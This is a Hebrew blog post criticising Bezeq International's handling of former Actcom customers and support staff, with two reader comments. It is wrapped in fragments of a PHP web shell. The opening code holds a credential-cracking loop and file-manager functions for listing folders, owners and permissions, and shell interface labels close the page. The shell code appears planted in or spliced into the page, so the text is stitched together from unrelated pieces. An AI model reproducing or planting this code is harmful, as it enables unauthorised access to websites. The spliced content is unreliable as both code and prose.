curl_getinfo($ch, CURLINFO_HTTP_CODE); if ( curl_errno($ch) == 28 ) { print " Error : Connection Timeout , Sleep for 5s .

"; sleep(5); } else if ( curl_errno($ch) == 0 ) { print "[~] Cracking Success With Username "$user" and Password "$pass"

"; exit; } else{ if($httpcode===0){ echo "No response
"; curl_setopt($ch, CURLOPT_URL, "http://$host:" . $port); curl_setopt($ch, CURLOPT_HEADER, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $cont = curl_exec($ch); $farr = explode("URL=",$cont); $narr = explode('">',$farr[1]); echo "Please change to this host -> ". $narr[0]; exit; } //echo $httpcode; } curl_close($ch); } public function DFSCurrent($slashtype){ echo "

Current folder : "; $truepath = array(); if(isset($GLOBALS['DFConfig'][0]['dfp'])){ $path = $this->DFSDirFilter($this->Dec($GLOBALS['DFConfig'][0]['dfp'])); $path = $this->Dec($path); }else{ $path = getcwd(); } $dfsEP = explode($slashtype,$path); $dfsSZ = sizeof(($dfsEP)); $dfsGE = ""; for($c=0;$c<$dfsSZ;$c++){ array_push($truepath,$dfsEP[$c]); } if($GLOBALS['DFSPlatform']!=='win'){ $endslash = $this->DFSDirFilter($slashtype); echo "$slashtype"; } for($i=0;$iDFSDirFilter($dfsGE); //$this->string = preg_replace('/'.$slashtype.$slashtype.'/i',$slashtype,$dfsGE); echo "$dfsEP[$i]"; echo $slashtype; } } echo "

"; } public function DFSOG($file){ if($GLOBALS['DFSPlatform']!=='win'){ $owner_file = (fileowner($file)?:0); $group_file = (filegroup($file)?:0); $checkposix = $this->DFSDat('ini','disable_functions'); if($checkposix !=="None"){ $checkposix = explode(",",$checkposix); if(!in_array("posix_getpwuid",$checkposix)){ $ownx = posix_getpwuid($owner_file)['name']?:'nobody'; $grpx = posix_getpwuid($group_file)['name']; if(($ownx!==NULL && $ownx!=="") || ($grpx!==NULL && $grpx!=="")){ $owner_group = $ownx . ':' . ($grpx?:$ownx); }else{ $owner_group = "nobody:nobody"; } }else{ $owner_group = "-:-"; } }else{ $ownx = posix_getpwuid($owner_file)['name']?:'nobody'; $grpx = posix_getpwuid($group_file)['name']; if(($ownx!==NULL && $ownx!=="") || ($grpx!==NULL && $grpx!=="")){ $owner_group = $ownx . ':' . ($grpx?:$ownx); }else{ $owner_group = "nobody:nobody"; } } }else{ $owner_group = "-:-"; } return $owner_group; } public function DFSPerms($f) { // Special thanks to marijuana shell developer $p = $GLOBALS['DFSyntax'][1]($f); if (($p & 0xC000) == 0xC000) { $i = 's'; } elseif (($p & 0xA000) == 0xA000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000

זמן עדכון: 01/01/1970 00:00

לזלזל בלקוחות ולהשאר בחיים?

לאחרונה כתבתי כאן על חברת אקטקום שנרכשה על ידי בזק בינלאומי ובין השאר החלה לזלזל בקהילת התוכנה החופשית. לאחר שאני כתבתי ועוד אחרים כתבו, כתבה על זה אדר שלו ב YNET ואז לפתע נשמעו זמירות אחרות. אנשי בזק בינלאומי פתאום אומרים שהם רוצים לתמוך בקהילת התוכנה החופשית ואז כמובן הציעו לארח את השרתים באותם תנאים.

אבל אם חשבנו שהנמר הפך את עורו אז כמובן טעינו. הזלזול עכשיו הגיע לא רק לקהילת התוכנה החופשית אלא לכלל לקוחות אקטקום לשעבר.

זה התחיל בזה שפטרו את אנשי התמיכה הטובים שהיו באקטקום (לפחות את חלק מהם) ואנשים שפנו לאקטקום בבקשת תמיכה הגיעו לתומך שלא יודע מימינו ומשמאלו. אבל מי שפנה לתמיכה היה מן הסתם מישהו מקהילת התוכנה החופשית שכפי שכתבתי בעבר, כשאדם כזה צריך תמיכה, זו בעיה אמיתית. אנשי התמיכה הטובים שהיו לאקטקום ידעו לפתור את רוב הבעיות אבל בזקבינלאומי ברוב טפשותם את האנשים הטובים פטרו. אני מסוגל להבין שבעצם נוצר להם מצב של עודף אנשי תמיכה ולכן יש לפטר אנשים אבל את מי מפטרים? למה לפטר את הטובים?

עוד סיפור שמעתי הבוקר כאשר ידידי גידי (שאותו הזכרתי כאן בעבר) שהוא עיוור ולכן נזקק לעזרים מיוחדים על מנת להשתמש במחשב. מצא את עצמו מנותק מהאינטרנט. למה? כי בזקבינלאומי שינו את החיבור שלו שהיה ישיר ללא "חיגן" לחיבור הדורש "חיגן" הסיבה שהוא זקוק לחיבור ישיר היא שתוכנת הברייל אתה הוא עובד מתנגשת עם החייגן ואז הוא לא יכול בכלל להשתמש במחשב.

התומך איתו הוא דיבר גם הוא, לא הבין מימנו ומשמאלו וביקש ממנו ללחוץ על כפתור בצד שמאל למטה של המסך. הוא לא הבין שבצד השני של הקו נמצא אדם עיוור שלא רואה את המסך ולא יכול להגיע לכפתור בצד שמאל למטה אלא אם מסבירים לו כיצד להגיע לשם עם החיצים כי עם עכבר הוא לא יכול לעבוד.

משום מה יש לי תחושה שעל הדברים האלו לא יקום לחץ ציבורי כמו שקם על האתרים של קהילת התוכנה החופשית.
בארץ משום מה מקובל לזלזל בלקוחות.

בכל מקרה כנראה הגיע הזמן שנצביע ברגלים ונתרחק מבזקבינלאומי. שקנו את חברת האינטרנט הטובה בארץ והרסו אותה לחלוטין.
לא רק שהרסו את החברה אותה הם קנו אלא גם התחילו לזלזל באותם אלו שבחרו באקטקום כספק האינטרנט שלהם בגלל היחוד של אקטקום בתמיכה טובה שכמוה לא קיימת בארץ.

לאן נלך עכשיו?
אשמח לשמוע הצעות והמלצות על ספקי אינטרנט שבאמת מתחשבים בלקוחות שלהם.

הוספת תגובה

	וואיי,, חשבתי שרק אני מתמודד עם הבעיות האלו	HN	01/01/1970 00:00:00
	כלקוח אקטקום, וכאחד שלא צורך תמיכה טכנית, פניתי אתמול לראשונה לתמיכה כי החיבור שלי קירטע. ענה לי תומך נחמד, אבל לא מבין שום דבר. לקח לי רבע שעה של הסברים (סבלניים מאד, לשם שינוי מצידי) להסביר לו מה זה אומר שבבדיקת פינג יש לי 30% של דרופים ולמה זה לא בסדר. אחרי שהוא כבר הבין הוא פנה ל"תומך בכיר" וזה הציע שאני אעשה ריסט למחשב. בקיצור - גם אני מחפש חלופה לנפילה הזו. הוספת תגובה

	לצערי אתה לא היחיד	אורי עידן	01/01/1970 00:00:00
	לשמחתי הרבה אני אישית לא נתקלתי בבעיות. הפוסט הזה נכתב אחרי ששמעתי מלא מעט אנשים על בעיות. אז אפילו התומך הבכיר שלהם חושב שריסט פותר את הבעיות? מראה שהם חיים בעולם של צעצועים לא מערכות הפעלה. הוספת תגובה

שם:
דואר אלקטרוני:	חובה, לא יוצג
אתר אינטרנט:
כותרת:
תוכן:
שלח מייל בתגובה להודעה

הבלוג של אורי עידן

כתיבה, שייט תוכנה חופשית ומה שבינהם

Email Bombing

עדכונים אחרונים

פופולריים ביותר

הגיגים על מחשבים

מפת האתר

שונות

לזלזל בלקוחות ולהשאר בחיים?

הוסף תגובה

Full path :	".$pathfile."
New name :

Set offset,limit

Set offset,limit